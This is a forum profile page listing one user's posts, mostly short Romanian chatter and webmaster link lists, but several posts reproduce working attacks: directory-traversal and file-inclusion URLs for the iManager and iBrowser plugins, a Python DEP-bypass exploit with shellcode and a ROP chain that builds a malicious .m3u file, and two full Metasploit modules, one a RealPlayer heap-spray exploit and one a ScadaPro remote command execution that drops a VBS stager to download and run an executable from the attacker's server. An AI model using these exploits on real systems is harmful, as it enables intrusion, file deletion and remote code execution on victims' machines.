Jump to content

Gonzalez

Active Members
 View Profile  See their activity

  • Posts

    1577

  • Joined

  • Last visited

  • Days Won

    10

 Content Type 

Everything posted by Gonzalez

  1. Gonzalez
    Good news -Gonzalez
  2. Gonzalez
    Danke. -Gonzalez
  3. Gonzalez
    -Gonzalez
  4. Gonzalez
    Mersi pentru site. -Gonzalez
  5. Gonzalez
    Check out: http://php.opensourcecms.com/scripts/show.php?catid=1&category=CMS%20/%20Portals -Gonzalez
  6. Gonzalez
    Cred si eu ca e facut de la 0, nu am reusit sa-l gasesc pe Google. -Gonzalez
  7. Gonzalez
    Ce script folosesc cei de la vplay.ro ? E custom sau il pot gasi pe Google, am incercat sa caut PHP script dar nu am dat de nici un script care sa semene cu cel de la vPlay. Stie careva unde pot gasi scriptul acela? -Gonzalez
  8. Gonzalez
    Social bookmarking sites pentru cei cu SEO. http://www.social-bookmarking-sites-list.com/ -Gonzalez
  9. Gonzalez
    Nu am dat search, greseala mea. -Gonzalez
  10. Gonzalez
    Au fost verificate in urma cu cateva luni: 1. http://forums.digitalpoint.com 2. http://www.vuju.com/ 3. http://checkthisup.com 4. http://www.sitepoint.com/forums 5. http://www.thewebmasterforum.net 6. http://www.webmasterforums.com 7. http://www.allcoolforum.com 8. http://www.warriorforum.com 9. http://forums.webicy.com 10. http://thehyipforum.com 11. http://www.webmasterforumsonline.com 12. http://www.webmasters.am/forum 13. http://www.webmasterforums.net 14. http://www.devhunters.com 15. http://www.webmaster-forum.net 16. http://www.geekvillage.com/forums 17. http://www.zymic.com/forum 18. http://www.webmastershelp.com 19. http://www.webmasterdesk.org 20. http://www.webmasterground.com 21. http://developers.evrsoft.com/forum 22. http://www.websitebabble.com 23. http://www.elancetalk.com 24. http://www.talkingcity.com 25. http://www.australianwebmaster.com 26. http://www.wtricks.com 27. http://www.forums.webzonetalk.com 28. http://www.htmlforums.com 29. http://www.searchbliss.com/forum 30. http://www.webmasterize.com 31. http://www.webmasterserve.com 32. http://www.freehostforum.com 33. http://www.seorefugee.com/forums 34. http://www.cre8asiteforums.com/forums 35. http://forums.seo.ph 36. http://forums.delphiforums.com 37. http://www.web-mastery.net 38. http://www.webworkshop.net/seoforum/index.php 39. http://www.webproworld.com 40. http://www.bzimage.org 41. http://www.v7n.com/forums 42. http://www.dnforum.com 43. http://www.webcosmoforums.com 44. http://forums.webicy.com 45. http://forum.hittail.com/phpbb2/index.php 46. http://www.affiliateseeking.com/forums 47. http://siteownersforums.com/index.php 48. http://www.webmaster-forums.net 49. http://www.geekpoint.net 50. http://www.smallbusinessforums.org 51. http://forums.ukwebmasterworld.com 52. http://www.experienceadvertising.com/forum 53. http://opensourcephoto.net/forum 54. http://forums.seochat.com 55. http://forums.searchenginewatch.com 56. http://www.ihelpyou.com/forums 57. http://dishnews.medianetwork.co.in/yabb2/YaBB.pl 58. http://www.businesss-forum.com 59. http://www.9mb.com 60. http://acapella.harmony-central.com/forums 61. http://forums.seroundtable.com 62. http://www.submitexpress.com/bbs 63. http://www.startups.co.uk/6678842908...04/forums.html 64. http://www.webmaster-talk.com 65. http://forums.comicbookresources.com 66. http://www.clicks.ws/forum/index.php 67. http://www.acorndomains.co.uk 68. http://forums.onlinebookclub.org 69. http://www.ableton.com/forum 70. http://www.davidcastle.org/BB 71. http://www.webtalkforums.com 72. http://www.bloggapedia.com/forum 73. http://www.bloggertalk.com/forum.php 74. http://paymentprocessing.cc 75. http://www.directoryjunction.com/forums 76. http://www.internetmarketingforums.net 77. http://www.lex224.com/forums/index.php 78. http://forum.joomla.org 79. http://forum.mambo-foundation.org/index.php 80. http://www.simplemachines.org/community/index.php 81. http://www.namepros.com/index.php 82. http://loanofficerforum.com/forum 83. http://iq69.com/forums 84. http://forum.hot4s.com.au 85. http://forums.mysql.com 86. http://forums.amd.com/forum 87. http://softwarecommunity.intel.com/i...y/en-us/Forums 88. http://forums.cnet.com 89. http://seotalk.medianetwork.co.in 90. https://www.computerbb.org 91. http://forum.vbulletinsetup.com 92. http://www.irishwebmasterforum.com 93. http://www.app-developers.com 94. http://forums.stuffdaily.com 95. http://forums.seo.com 96. http://www.webdigity.com 97. http://www.inboundlinksforum.com 98. http://forums.gentoo.org 99. http://ubuntuforums.org 100. http://forum.textpattern.com 101. http://talk.iwebtool.com 102. http://www.frogengine.com/forum 103. http://www.capitaltheory.com 104. http://www.smsbucket.com/forums/ 105. http://www.seoin.info 106. http://vidberry.com 107. http://www.teamaguilar.com/forum/ 108. http://www.discuss4fun.com 109. http://www.fightagainstrecession.com
  11. Gonzalez
    Best encryption for network security. http://www.crypo.com/ -Gonzalez
  12. Gonzalez
    Mersi pentru link. -Gonzalez
  13. Gonzalez
    iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability Vendor: net4visions.com Product web page: http://www.net4visions.com Affected version: <= 1.2.8 Build 02012008 Summary: With iManager you can manage your files/images on your webserver, and it provides user interface to most of the phpThumb() functions. It works either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor. Desc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the 'd' parameter. ====================================================================== /scripts/phpCrop/crop.php: ---------------------------------------------------------------------- 32: if( isset($_REQUEST['s']) ) { 33: //delete previous temp files 34: $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE); 35: if ( is_array ( $matches ) ) { 36: foreach ( $matches as $fn) { 37: @unlink($fn); 38: } 39: } ====================================================================== Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Advisory ID: ZSL-2011-5043 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php 15.09.2011 -- http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00
  14. Gonzalez
    iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability Vendor: net4visions.com Product web page: http://www.net4visions.com Affected version: <= 1.2.8 Build 02012008 Summary: With iManager you can manage your files/images on your webserver, and it provides user interface to most of the phpThumb() functions. It works either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor. Desc: iManager suffers from a file inlcusion vulnerability (LFI) / file disclosure vulnerability (FD) when input passed thru the 'lang' parameter to imanager.php, rfiles.php, symbols.php, colorpicker.php, loadmsg.php, ov_rfiles.php and examples.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes. ====================================================================== /langs/lang.class.php: ---------------------------------------------------------------------- 67: function loadData() { 68: global $cfg; 69: include( dirname(__FILE__) . '/' . $this -> lang.'.php' ); 70: $this -> charset = $lang_charset; 71: $this -> dir = $lang_direction; 72: $this -> lang_data = $lang_data; 73: unset( $lang_data ); 74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' ); 75: $this -> default_lang_data = $lang_data; 76: } ====================================================================== Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Advisory ID: ZSL-2011-5042 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5042.php 15.09.2011 -- http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/imanager.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/colorpicker.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/ov_rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/images/examples/examples.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
  15. Gonzalez
    iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability Vendor: net4visions.com Product web page: http://www.net4visions.com Affected version: <= 1.4.1 Build 10182009 Summary: iBrowser is an image browser plugin for WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor developed by net4visions. It allows image browsing, resizing on upload, directory management and more with the integration of the phpThumb image library. Desc: iBrowser suffers from a file inlcusion vulnerability (LFI) / file disclosure vulnerability (FD) when input passed thru the 'lang' parameter to ibrowser.php, loadmsg.php, rfiles.php and symbols.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes. ====================================================================== /langs/lang.class.php: ---------------------------------------------------------------------- 67: function loadData() { 68: global $cfg; 69: include( dirname(__FILE__) . '/' . $this -> lang.'.php' ); 70: $this -> charset = $lang_charset; 71: $this -> dir = $lang_direction; 72: $this -> lang_data = $lang_data; 73: unset( $lang_data ); 74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' ); 75: $this -> default_lang_data = $lang_data; 76: } ====================================================================== Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Advisory ID: ZSL-2011-5041 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5041.php 15.09.2011 -- http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
  16. Gonzalez
    # written to bypass OptIn/OptOut DEP policy # tested on windows xp sp3 running in virtualbox import sys print "\n============================" print " MY MP3 Player DEP Bypass " print " Bypass OptIn/OptOut Policy " print " Tested on Windows XP SP3 " print " Written by Blake " print "============================\n" # calc.exe - 1014 bytes of space for shellcode shellcode =( "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47" "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38" "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48" "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58" "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44" "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38" "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47" "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a" "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53" "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57" "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39" "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" "\x4e\x46\x43\x36\x42\x50\x5a") buffer = "\x41" * 1024 eip = "\x99\x13\x09\x5d" # RETN - COMCTL32 rop = "\x42" * 4 # junk to compensate rop += "\x8c\x39\x09\x5d" # POP EBX, RETN - COMCTL32 rop += "\xff\xff\xff\xff" rop += "\x28\x90\x12\x77" # INC EBX, RETN - OLEAUT32 rop += "\x44\x94\x12\x77" # POP EBP, RETN - OLEAUT32 rop += "\xa4\x22\x86\x7c" # SetProcessDEPPolicy rop += "\x36\x1c\x12\x77" # POP EDI, RETN - OLEAUT32 rop += "\x37\x1c\x12\x77" # RETN - OLEAUT32 rop += "\xd4\x1a\x12\x77" # POP ESI, RETN - OLEAUT32 rop += "\x37\x1c\x12\x77" # RETN - OLEAUT32 rop += "\xf7\x8c\x14\x77" # PUSHAD, RETN - OLEAUT32 nops = "\x90" * 20 junk = "\x42" * (2000 - len(nops + shellcode + rop)) print "[+] Creating malicious .m3u file" try: file = open("exploit.m3u","w") file.write(buffer + eip + rop + nops + shellcode + junk) file.close() print "[+] File created" except: print "[x] Could not create file" raw_input("\nPress any key to exit...\n")
  17. Gonzalez
    ## # $Id: realplayer_qcp.rb 13745 2011-09-17 06:48:33Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "RealNetworks Realplayer QCP Parsing Heap Overflow", 'Description' => %q{ This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted "fmt" chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 13745 $", 'Author' => [ 'Sean de Regge', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2011-2950'], ['OSVDB', '74549'], ['BID', '49172'], # ZDI advisory ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-265/'], # Vendor advisory ['URL', 'http://service.real.com/realplayer/security/08162011_player/en/'], #Fix commit ['URL', 'http://lists.helixcommunity.org/pipermail/datatype-cvs/2011-April/015469.html'], ], 'Payload' => { 'Space' => 1024 }, 'DefaultOptions' => { 'ExitFunction' => "process", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'Internet Explorer 6 on XP SP3', { 'Nops' => "%u1414%u1414" } ], [ 'Internet Explorer 7 on XP SP3', { 'Nops' => "%u0c0c%u0c0c" } ], ], 'DisclosureDate' => "Aug 16 2011", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']) ], self.class) end def get_target(cli, request) #Default target my_target = target vprint_status("User-Agent: #{request.headers['User-Agent']}") if target.name == 'Automatic' agent = request.headers['User-Agent'] if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ #Windows XP + IE 6 my_target = targets[1] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/ #Windows XP + IE 7.0 my_target = targets[2] elsif agent =~ /RMA/ #RealPlayer identifies itself as "RMA/1.0 (compatible; RealMedia)" #when requesting our trigger file return 'RMA' else #If we don't recognize the client, we don't fire the exploit my_target = nil end end return my_target end def exploit #Set trigger file name @filename = rand_text_alpha(rand(6) + 3) #Create the trigger file @trigger = build_trigger super end def on_request_uri(cli, request) #Pick the right target vprint_status("Selecting target...") my_target = get_target(cli, request) if my_target.nil? print_error("Target not supported") send_not_found(cli) return end vprint_status("URL: #{request.uri.to_s}") #Send the trigger file upon request if request.uri.match(/\.qcp$/) print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}") send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' }) return end vprint_status("Building shellcode...") code = Rex::Text.to_unescape(payload.encoded) vprint_status("Building spray...") spray = build_spray(my_target, code) #obfuscate on demand vprint_status("Obfuscating javascript...") if datastore['OBFUSCATE'] spray = Rex::Exploitation::JSObfu.new(spray) spray.obfuscate end vprint_status("Building html...") #Value for the 'Src' parameter of our ActiveX control trigger_file = "" if ("/" == get_resource[-1,1]) trigger_file = get_resource[0, get_resource.length - 1] else trigger_file = get_resource end trigger_file << "/#{@filename}.qcp" html = <<-EOS <HTML> <HEAD> </HEAD> <BODY> <script language='javascript'> #{spray} </script> <OBJECT ID=RVOCX CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH=320 HEIGHT=240> <PARAM NAME="SRC" VALUE="#{trigger_file}"> <PARAM NAME="CONTROLS" VALUE="ImageWindow"> <PARAM NAME="CONSOLE" VALUE="one"> <PARAM NAME="AUTOSTART" VALUE="true"> <EMBED SRC="#{trigger_file}" WIDTH=320 HEIGHT=240 NOJAVA=true CONTROLS=ImageWindow CONSOLE=one AUTOSTART=true> </OBJECT> </BODY> EOS print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...") send_response( cli, html, {'Content-Type' => 'text/html'} ) end def build_trigger() overflow_size = 700 overflow_string = "\x11" * 700 #riff_mark trigger = "\x52\x49\x46\x46" #total_size trigger << [0xed44 + overflow_size].pack("V") #qlcm_tag trigger << "\x51\x4c\x43\x4d" #fmt_tag trigger << "\x66\x6d\x74\x20" #fmt_size trigger << [0x96 + overflow_size].pack("V") #fmt_content trigger << "\x01\x00\x8d\xd4\x89\xe6\x76\x90" trigger << "\xb5\x46\x91\xef\x73\x6a\x51\x00" trigger << "\xce\xb4\x01\x00\x54\x49\x41\x20" trigger << "\x49\x53\x2d\x31\x32\x37\x20\x45" trigger << "\x6e\x68\x61\x6e\x63\x65\x64\x20" trigger << "\x56\x61\x72\x69\x61\x62\x6c\x65" trigger << "\x20\x52\x61\x74\x65\x20\x43\x6f" trigger << "\x64\x65\x63\x2c\x20\x53\x70\x65" trigger << "\x65\x63\x68\x20\x53\x65\x72\x76" trigger << "\x69\x63\x65\x20\x4f\x70\x74\x69" trigger << "\x6f\x6e\x20\x33\x20\x00\x00\x00" trigger << "\x00\x00\x00\x00\x00\x00\x00\x00" trigger << "\x00\x00\x00\x00\xc8\x32\x16\x00" trigger << "\xa0\x00\x40\x1f\x10\x00\x05\x00" trigger << "\x00\x00\x16\x04\x0a\x03\x05\x02" trigger << "\x02\x01\x00\x00\x00\x00\x00\x00" trigger << "\x00\x00\x00\x00\x00\x00\x00\x00" trigger << "\x00\x00\x00\x00\x00\x00\x00\x00" trigger << "\x00\x00\x00\x00\x00\x00" trigger << overflow_string #vrat_tag trigger << "\x76\x72\x61\x74" #vrat_size trigger << [0x8].pack("V") #vrat_content trigger << "\x01\x00\x00\x00\x06\x13\x00\x00" #data_tag trigger << "\x64\x61\x74\x61" #data_size trigger << [0xec8a].pack("V") #data_content trigger << rand_text_alpha(0xec8a) return trigger end def build_spray(mytarget, code) spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{code}"); var nops = unescape("#{mytarget['Nops']}"); while (nops.length < 0x10000) nops += nops; offset = nops.substring(0, 0x7BE0); var shellcode = offset + code + nops.substring(0, 0x8000-offset.length-code.length); while (shellcode.length < 0x20000) shellcode += shellcode; block = shellcode.substring(0, (0x10000-6)/2); heap_obj.gc(); for (var i=0; i < 0x1400; i++) { heap_obj.alloc(block); } JS spray = heaplib(spray) return spray end end
  18. Gonzalez
    ## # $Id: scadapro_cmdexe.rb 13737 2011-09-16 08:23:59Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Measuresoft ScadaPro <= 4.0.0 Remote Command Execution', 'Description' => %q{ This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Initial discovery/poc 'mr_me <steventhomasseeley[at]gmail.com>', # msf 'TecR0c <tecr0c[at]tecninja.net>', # msf ], 'Version' => '$Revision: 13737 $', 'References' => [ #[ 'CVE', '?'], #[ 'OSVDB', '?'], [ 'BID', '49613'], [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'], [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'], # seemed pretty accurate to us [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ # truly universal [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 16 2011')) register_options( [ Opt::RPORT(11234), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), ], self.class) end # couldn't generate a vbs or exe payload and then use the wF command # as there is a limit to the amount of data to write to disk. # so we just write out a vbs script like the old days. def build_vbs(url, stager_name) name_xmlhttp = rand_text_alpha(2) name_adodb = rand_text_alpha(2) tmp = "#{@temp_folder}/#{stager_name}" vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") " vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send" vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") " vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 " vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody " vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 " vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}" return vbs end def on_request_uri(cli, request) if request.uri =~ /\.exe/ print_status("Sending 2nd stage payload to #{cli.peerhost}:#{cli.peerport}...") return if ((p=regenerate_payload(cli)) == nil) data = generate_payload_exe( {:code=>p.encoded} ) send_response(cli, data, {'Content-Type' => 'application/octet-stream'} ) return end end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @payload_name = rand_text_alpha(4) @temp_folder = "C:/Windows/Temp" if datastore['SRVHOST'] == '0.0.0.0' lhost = Rex::Socket.source_address('50.50.50.50') else lhost = datastore['SRVHOST'] end payload_src = lhost payload_src << ":" << datastore['SRVPORT'] << datastore['URIPATH'] << @payload_name << ".exe" stager_name = rand_text_alpha(6) + ".vbs" stager = build_vbs(payload_src, stager_name) path = "..\\..\\..\\..\\..\\windows\\system32" createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n" download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n" print_status("Sending 1st stage payload...") connect sock.get_once() sock.put(createvbs) sock.get_once() sock.put(download_execute) handler() disconnect super end end
  19. Gonzalez
    Coldplay - Violet Hill.mp3 -Gonzalez
  20. Gonzalez
    Try Goooogle. -Gonzalez
  21. Gonzalez
    ACUM: Leone ft sierra refugee all stars - Big lesson -Gonzalez
  22. Gonzalez
    ACUM: Alpha blondy - Alpha kaya -Gonzalez
  23. Gonzalez

    Client de IM?

    Gonzalez replied to tromfil's topic in Off-topic

    Web-based -Gonzalez
  24. Gonzalez
    Contacteaza Support-Team la ambele host-uri. -Gonzalez
  25. Gonzalez

    Limbaj

    Gonzalez replied to zovy52's topic in Off-topic

    E Java. -Gonzalez
×
×
  • Create New...